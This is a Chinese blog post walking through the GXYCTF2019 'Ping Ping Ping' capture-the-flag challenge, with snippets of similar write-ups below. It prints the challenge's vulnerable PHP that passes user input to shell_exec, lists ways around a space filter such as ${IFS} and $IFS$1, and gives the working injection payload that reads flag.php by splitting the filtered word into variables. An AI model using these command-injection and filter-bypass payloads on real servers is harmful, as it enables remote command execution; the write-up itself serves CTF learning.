[GXYCTF2019]Ping Ping Ping解题过程

最新推荐文章于 2024-07-29 22:50:36 发布
最新推荐文章于 2024-07-29 22:50:36 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: # 网络安全 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50377269/article/details/130959826
版权

1、来看看靶场

发现就只有这个提示,尝试一下在url输入框进行测试

 

 页面返回ping的结果,然后我之前也做过另外一道类似的题

链接:[ACTF2020 新生赛]Exec1命令注入_[actf2020 新生赛]exec 1_旺仔Sec的博客-CSDN博客

尝试用管道符

果然是可以的,再尝试一下访问flag.php

 

space应该是空格被过滤了,那我们来进行绕过空格

常用的空格过滤:

  1. ${IFS}替换
  2. $IFS$1替换
  3. ${IFS替换
  4. %20替换
  5. <和<>重定向符替换
  6. %09替换
${IFS}
$IFS$1 
<
<>
{cat,flag.php} 		//用逗号实现空格功能
%09		//需要php环境

但是好像还是没啥用

 那我们访问之前第二个文件,index.php文件试试

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "

";
  print_r($a);
}

?>

这里大概是使用正则匹配对参数,例如{},<>,* ,?,空格,bash,flag等进行了过滤,才会有我们刚才看到的各种提示
这里观察到有个a变量,使用shell_exec命令进行了shell命令执行,然后将结果返回到a变量中,最后输出a shell_exec命令,这里的ping -c 4是发送4条请求
那么我们可以利用变量来进行覆盖绕过flag过滤

构造一下payload

/?ip=1;a=g;cat$IFS$1fla$a.php;

 FLAG:“flag{a6e9d752-79bf-43e0-ab8f-f789fba639ae}”

旺仔Sec
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1393
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
[GXYCTF 2019]Ping Ping Ping题目解析
2201_75327657的博客
10-09 984
20(space)、%09(tab)、$IFS$9、${IFS}$9、 {IFS}、IFS这一些都是。但是一般我们都将后面的内容先写出来也就是b=ag;a=flag这样做的目的是为了绕过字符串匹配。最后的组成就是127.0.0.1;观察我们写的代码大概有可能空格就被过滤了,这时候需要找空格的替代品。本题考察的内容是rce绕过,本事过滤的东西不算多也算是比较好绕过。我们看看index.php中有什么东西。我用了$IFS$9做替换给的提示说。也就印证了以上我们的猜想。
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7902
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
[GXYCTF 2019]Ping Ping Ping(内联执行)、[鹤城杯 2021]EasyP ($_SERVER)
2401_82985722的博客
05-10 618
于是就可以使用cat$IFS$9`ls` 这个命令来输出ls里面的flag.php以及index.php中的内容。$_SERVER['REQUEST_URI'] 得到:/php/flag.php/flag?1.$_SERVER['PHP_SELF']:获取当前执行脚本的文件名(相对于网站根目录的路径及 PHP 程序名称。$_SERVER['PHP_SELF'] 得到:/php/flag.php/flag。$_SERVER['SCRIPT_NAME'] 得到:/php/flag.php
[GXYCTF2019]Ping Ping Ping
V50小白
09-15 1204
1、 点开题目链接发现是ping一个ip的参数 2、 输入/?ip=127.0.0.1尝试,只出现一个响应,说明是Windows的ping命令 3、 输入/?ip=127.0.0.1;ls查看当前存在的目录文件夹 4、输入命令/?ip=127.0.0.1;cat flag.php查看flag文件,发现fxck your space!(关闭你的空间) 说明存在对空格的过滤 5、网上一般的判断空格过滤方法:判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用: 注:%20(spac
BUUCTF—[GXYCTF2019]Ping Ping Ping1
qq_57778984的博客
10-22 338
内联绕过就是将反引号内命令的输出结果作为另一个命令的输入来执行,比如系统对flag字符进行了过滤,但是单独使用ls命令时又会回显出index.php和flag.php文件,那么我们可以通过ls命令将index.php和flag.php作为输入,通过cat查看两个文件获取flag,而不用输入cat flag.php触发关键词。3.尝试在执行ping命令后执行其他命令,用";连接两个命令时,第二个命令只有在第一个命令执行成功的情况下才会执行。连接两个命令时,第二个命令只有在第一个命令执行失败的情况下才会执行。
BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 5790
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
BUUCTF[GXYCTF2019]Ping Ping Ping
m0_47745762的博客
07-20 220
一、题目内容 在过滤中,运用Linux命令对其进行绕过 二、解题步骤 ①使用字符串拼接对其进行绕过 (1)进入靶机中 (2) 我们首先对他随便ping一下,看能得到什么信息 (3)发现能够成功运行,通过ls命令进行查找当前目录的文件 (4)发现当前目录下有两个文件,其中就有flag,我们通过cat命令对他进行访问 (5)然后它提示有空格,空格被过滤了,我们进行空格绕过 (6)然后提示符号{},{}符号也被过滤了,在使用其他的空格绕过 (7)然后提示flag也被..
[GXYCTF2019]Ping Ping Ping 1解题思路
生死看淡,不服就干的博客
03-12 4135
打开目标靶机 发现提示很简洁 那就放在URL里尝试吧 /?ip=127.0.0.1 有明显的的回显结果 并没有此类题目的经验,第一次碰到,只能尝试,发现空格等很多符号被过滤,看老哥们的提示,这是经典的Linux命令执行,使用命令执行的管道符 “|” 尝试列出文件,OK那就开干吧 构造如下 payload /?ip=127.0.0.1|ls 有结果,得到文件名称 4. 拿到文件名,flag 大概率在 flag.php 中,那么接下来肯定尝试去访问,或者列出文件内容啊 ?ip=1|cat flag.
CTF_Web_[GXYCTF2019]Ping Ping Ping
十二_的博客
07-26 1762
表示上一条命令执行失败后,才执行下一条命令,如catnofile||echo“fail”表示前一条命令执行成功时,才执行后一条命令,如echo'1‘&&echo‘2’表示管道,上一条命令的输出,作为下一条命令参数,如echo‘yes’|wc-l。发现没有任何新的回显,应该是因为前面是假ping,所以后面的命令不执行。如上图,“||”会有效果—显示了两个后缀为“php”的文件名.文件,或许我们要找的flag就在其中。根据大佬解题的思路,我们来找文件,进行测试。...
12、案例分析答题卡 12、案例分析答题卡
01-09
对于案例分析题,可能需要在答题卡上书写详细的分析过程、解决方案或计算步骤。 三、案例分析题型解析 1. **场景分析**:考生需根据提供的网络设计或优化场景,分析存在的问题、潜在风险以及改进方案。这需要考生...
012 2019年湖南省职业院校技能竞赛云平台服务器配置答题卡-A卷1
08-08
- 手工下发流表以改变网络流量路径,例如使H1能ping通H3,同时验证其他主机间的通信情况。 - `lynx`命令在命令行下访问HTTP服务,确保Web服务在指定IP上的可用性。 这些知识点涵盖了云计算环境中网络配置、主机...
计算机网络课后题指导和解题思路
05-20
此外,ICMP(Internet控制消息协议)用于网络诊断,如ping命令就依赖于ICMP回显请求和响应。 在网络应用层,HTTP(超文本传输协议)是Web浏览的基础,FTP(文件传输协议)用于文件的上传和下载,SMTP(简单邮件传输...
2022网安三级解题思路
12-03
在交换机上,配置ACL策略以允许Linux-B(192.168.11.1)ping通172.16.1.1,同时拒绝192.168.10.1到172.16.1.1的流量。在全局配置模式下,使用`access-list`命令定义规则,`permit`允许指定流量,`deny`则拒绝。将ACL...
012 云平台服务器配置答题卡2
08-08
【正文】 本题主要涉及的是云计算管理平台的网络环境部署,...总的来说,这个配置答题卡涵盖了云计算基础架构、网络服务、系统管理、安全策略以及SDN的实践应用等多个方面,旨在考察操作者在真实云环境下的综合能力。
WordPress原创插件:搜索引擎抓取首图seo图片
最新发布
爱酷码的博客
07-29 321
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 954
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 440
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值